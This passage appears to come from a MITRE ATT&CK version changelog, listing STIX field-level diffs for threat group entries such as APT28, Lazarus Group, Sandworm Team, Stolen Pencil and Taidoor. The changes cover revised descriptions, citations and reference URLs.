Kimsuky Kabar Cobra Feb 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

Details
dictionary_item_removed
STIX FieldOld valueNew Value
created_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
description[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)
aliases['Stolen Pencil']
object_marking_refs['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 00:18:21.594000+00:002021-10-07 12:21:31.309000+00:00
revokedFalseTrue
Deprecations

[G0015] Taidoor

Current version: 1.0

Description: [Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002021-10-15 00:34:25.521000+00:00
description[Taidoor](https://attack.mitre.org/groups/G0015) is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government. (Citation: TrendMicro Taidoor)[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Taidoor', 'description': '(Citation: TrendMicro Taidoor)'}
external_references{'source_name': 'TrendMicro Taidoor', 'description': 'Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.', 'url': 'http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf'}

mobile-attack

Minor Version Changes

[G0007] APT28

Current version: 3.2

Version changed from: 3.1 → 3.2


Old Description
New Description
t1[APT28](https://attack.mitre.org/groups/G0007) is a threat gt1[APT28](https://attack.mitre.org/groups/G0007) is a threat g
>roup that has been attributed to Russia's General Staff Main>roup that has been attributed to Russia's General Staff Main
> Intelligence Directorate (GRU) 85th Main Special Service Ce> Intelligence Directorate (GRU) 85th Main Special Service Ce
>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub
> August 2020) This group has been active since at least 2004> August 2020)(Citation: Cybersecurity Advisory GRU Brute For
>.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Tech>ce Campaign July 2021) This group has been active since at l
>nica GRU indictment Jul 2018) (Citation: Crowdstrike DNC Jun>east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: 
>e 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG->Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike 
>4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZ>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork
>ZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: >s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G
>Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:
>) (Citation: ESET Zebrocy May 2019)  [APT28](https://attack.> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018
>mitre.org/groups/G0007) reportedly compromised the Hillary C>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m
>linton campaign, the Democratic National Committee, and the >itre.org/groups/G0007) reportedly compromised the Hillary Cl
>Democratic Congressional Campaign Committee in 2016 in an at>inton campaign, the Democratic National Committee, and the D
>tempt to interfere with the U.S. presidential election. (Cit>emocratic Congressional Campaign Committee in 2016 in an att
>ation: Crowdstrike DNC June 2016) In 2018, the US indicted f>empt to interfere with the U.S. presidential election. (Cita
>ive GRU Unit 26165 officers associated with [APT28](https://>tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi
>attack.mitre.org/groups/G0007) for cyber operations (includi>ve GRU Unit 26165 officers associated with [APT28](https://a
>ng close-access operations) conducted between 2014 and 2018 >ttack.mitre.org/groups/G0007) for cyber operations (includin
>against the World Anti-Doping Agency (WADA), the US Anti-Dop>g close-access operations) conducted between 2014 and 2018 a
>ing Agency, a US nuclear facility, the Organization for the >gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi
>Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chem>ng Agency, a US nuclear facility, the Organization for the P
>icals Laboratory, and other organizations.(Citation: US Dist>rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi
>rict Court Indictment GRU Oct 2018) Some of these were condu>cals Laboratory, and other organizations.(Citation: US Distr
>cted with the assistance of GRU Unit 74455, which is also re>ict Court Indictment GRU Oct 2018) Some of these were conduc
>ferred to as [Sandworm Team](https://attack.mitre.org/groups>ted with the assistance of GRU Unit 74455, which is also ref
>/G0034). >erred to as [Sandworm Team](https://attack.mitre.org/groups/
 >G0034). 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 21:59:12.033000+00:002021-10-18 20:34:03.233000+00:00
description[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
external_references[1]['description'](Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['description']This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. (Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[7]['description'](Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[8]['description'](Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[9]['description'](Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[14]['source_name']DOJ GRU Indictment Jul 2018Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[14]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[14]['url']https://www.justice.gov/file/1080281/downloadhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[15]['source_name']Ars Technica GRU indictment Jul 2018DOJ GRU Indictment Jul 2018
external_references[15]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[15]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/https://www.justice.gov/file/1080281/download
external_references[16]['source_name']Crowdstrike DNC June 2016Ars Technica GRU indictment Jul 2018
external_references[16]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[16]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[17]['source_name']FireEye APT28Crowdstrike DNC June 2016
external_references[17]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[17]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[18]['source_name']SecureWorks TG-4127FireEye APT28
external_references[18]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[18]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[19]['source_name']FireEye APT28 January 2017SecureWorks TG-4127
external_references[19]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[19]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[20]['source_name']GRIZZLY STEPPE JARFireEye APT28 January 2017
external_references[20]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[20]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[21]['source_name']Sofacy DealersChoiceGRIZZLY STEPPE JAR
external_references[21]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[21]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[22]['source_name']Palo Alto Sofacy 06-2018Sofacy DealersChoice
external_references[22]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[22]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[23]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[23]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[23]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[24]['source_name']ESET Zebrocy May 2019Symantec APT28 Oct 2018
external_references[24]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[24]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[25]['source_name']US District Court Indictment GRU Oct 2018ESET Zebrocy May 2019
external_references[25]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[25]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[26]['source_name']Kaspersky SofacyUS District Court Indictment GRU Oct 2018
external_references[26]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[26]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://www.justice.gov/opa/page/file/1098481/download
external_references[27]['source_name']ESET Sednit Part 3Kaspersky Sofacy
external_references[27]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[27]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[28]['source_name']Talos Seduploader Oct 2017ESET Sednit Part 3
external_references[28]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[28]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttp://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[29]['source_name']Securelist Sofacy Feb 2018Talos Seduploader Oct 2017
external_references[29]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[29]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[30]['source_name']Accenture SNAKEMACKEREL Nov 2018Securelist Sofacy Feb 2018
external_references[30]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[30]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[31]['source_name']TrendMicro Pawn Storm Dec 2020Accenture SNAKEMACKEREL Nov 2018
external_references[31]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[31]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_references[32]['source_name']Microsoft STRONTIUM Aug 2019TrendMicro Pawn Storm Dec 2020
external_references[32]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[32]['url']https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[33]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Microsoft STRONTIUM Aug 2019
external_references[33]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[33]['url']https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
x_mitre_version3.13.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'}

[G0070] Dark Caracal

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-03 20:22:40.401000+00:002021-10-11 19:08:18.503000+00:00
x_mitre_version1.21.3

[G0034] Sandworm Team

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 13:13:09.511000+00:002021-10-15 21:46:19.437000+00:00
x_mitre_version2.02.1

ics-attack

Major Version Changes

[G0032] Lazarus Group

Current version: 2.0

Version changed from: 1.5 → 2.0


Old Description
New Description
t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a 
>threat group that has been attributed to the North Korean go>North Korean state-sponsored cyber threat group that has bee
>vernment.(Citation: US-CERT HIDDEN COBRA June 2017) The grou>n attributed to the Reconnaissance General Bureau.(Citation:
>p has been active since at least 2009 and was reportedly res> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko
>ponsible for the November 2014 destructive wiper attack agai>rean Cyber Groups September 2019) The group has been active 
>nst Sony Pictures Entertainment as part of a campaign named >since at least 2009 and was reportedly responsible for the N
>Operation Blockbuster by Novetta. Malware used by [Lazarus G>ovember 2014 destructive wiper attack against Sony Pictures 
>roup](https://attack.mitre.org/groups/G0032) correlates to o>Entertainment as part of a campaign named Operation Blockbus
>ther reported campaigns, including Operation Flame, Operatio>ter by Novetta. Malware used by [Lazarus Group](https://atta
>n 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.>ck.mitre.org/groups/G0032) correlates to other reported camp
> (Citation: Novetta Blockbuster) In late 2017, [Lazarus Grou>aigns, including Operation Flame, Operation 1Mission, Operat
>p](https://attack.mitre.org/groups/G0032) used KillDisk, a d>ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett
>isk-wiping tool, in an attack against an online casino based>a Blockbuster)  North Korean group definitions are known to 
> in Central America. (Citation: Lazarus KillDisk)  North Kor>have significant overlap, and some security researchers repo
>ean group definitions are known to have significant overlap,>rt all North Korean state-sponsored cyber activity under the
> and the name [Lazarus Group](https://attack.mitre.org/group> name [Lazarus Group](https://attack.mitre.org/groups/G0032)
>s/G0032) is known to encompass a broad range of activity. So> instead of tracking clusters or subgroups, such as [Andarie
>me organizations use the name Lazarus Group to refer to any >l](https://attack.mitre.org/groups/G0138), [APT37](https://a
>activity attributed to North Korea.(Citation: US-CERT HIDDEN>ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre.
> COBRA June 2017) Some organizations track North Korean clus>org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr
>ters or groups such as Bluenoroff,(Citation: Kaspersky Lazar>oups/G0094).   
>us Under The Hood Blog 2017) [APT37](https://attack.mitre.or 
>g/groups/G0067), and [APT38](https://attack.mitre.org/groups 
>/G0082) separately, while other organizations may track some 
> activity associated with those group names by the name Laza 
>rus Group. 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-18 16:34:25.941000+00:002021-10-14 22:04:58.182000+00:00
description[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government.(Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk) North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
external_references[7]['source_name']Novetta BlockbusterTreasury North Korean Cyber Groups September 2019
external_references[7]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
external_references[7]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://home.treasury.gov/news/press-releases/sm774
external_references[8]['source_name']Lazarus KillDiskNovetta Blockbuster
external_references[8]['description']Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[8]['url']https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
external_references[9]['source_name']Kaspersky Lazarus Under The Hood Blog 2017US-CERT HOPLIGHT Apr 2019
external_references[9]['description']GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
external_references[9]['url']https://securelist.com/lazarus-under-the-hood/77908/https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
external_references[10]['source_name']US-CERT HOPLIGHT Apr 2019Microsoft ZINC disruption Dec 2017
external_references[10]['description']US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
external_references[10]['url']https://www.us-cert.gov/ncas/analysis-reports/AR19-100Ahttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
external_references[11]['source_name']Microsoft ZINC disruption Dec 2017Secureworks NICKEL ACADEMY Dec 2017
external_references[11]['description']Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
